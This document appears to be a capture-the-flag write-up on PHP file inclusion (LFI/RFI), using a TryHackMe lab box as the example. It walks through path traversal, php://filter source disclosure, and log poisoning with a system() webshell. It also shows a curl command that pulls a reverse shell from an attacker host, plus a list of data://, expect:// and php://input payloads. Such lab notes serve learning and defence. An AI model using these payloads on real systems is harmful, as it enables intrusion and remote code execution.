File Inclusion Vulnerabilities (LFI and RFI)

Difference between File Inclusion and Directory Traversal

• Directory Traversal can obtain the contents of a file outside of the web server's web root. But not code execute

• File Inclusion vulnerability allow to include a file in the application's running code

• This means we can use file inclusion vulnerabilities to execute local or remote files, while directory traversal only allows us to read the contents of a file

LFI + Log Poisoning to get initial access (E.g.; THM- Dogcat Room)

1. Find the vulnerable parameter:

http://10.10.247.210/?view=dog

2. Modify the url with payload

http://10.10.247.210/?view=dog/../../../../../etc/passwd

I use ?view=../../../../etc/passwd but it is not working and 
alert as "only dog and cat are allow.
so I change the payload as above

3. Reading index.php file using php://filter warpper and decode the base64 string

• Normally index.php is executed and not show output, So we use base 64 encode method to look PHP code on index page.

http://10.10.247.210/?view=php://filter/convert.base64-encode/resource=dog/../index

So here there are a couple of interesting things to note. First, there is a $ext variable which kept on appending a .php extension to our input accounting for the previous errors. Also as long as our input to view contains the string dog or cat , we are good to go. So now that we know a bit more about the source code at play , lets try some path traversal.

http://10.10.247.210/?view=dog/../../../../../etc/passwd&ext=

Finally I can read /etc/passwd

There were a lot of way to get RCE but most famous two are php wrapper and log poisoning technique

4. Log Poisoning

• access apache2 log form LFI Vulnerable parameter check user agent parameter included in the log entry

http://10.10.247.210/?view=dog/../../../../../var/log/apache2/access.log&ext=

• Modify user agent parameter to inject PHP one liner and add cmd parameter in request

User-Agent: Mozilla/5.0 ,?php echo system($_GET['cmd']); ?>

• Add cmd parameter with command

http://10.10.247.210/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd=ls

Finally we got RCE

5. Getting Reverse shell using nc

• Choose /usr/share/webshell/php/php-reverse-shll.php. Change IP and Port to nc listener

• Build python http server

python3 -m http.server 80

• Type curl request in cmd parameter using RCE

curl -A “<?php file_put_contents(‘shell.php’,file_get_contents(‘http://{ATTACKER_IP}/shell.php'))?>" -s http://{Vitcim-IP}

• Check nc listener and get reverse shell

PHP wrapper for LFI to RCE Transformation

please read the detail about PHP wrapper at following link

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#lfi--rfi-using-wrappers

PHP Wrapper Detail

php://filter (case insensitive)

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

data://

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

expect://

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input:// (Most Popular)

curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v

zip://, phar:// and any other wrapper are present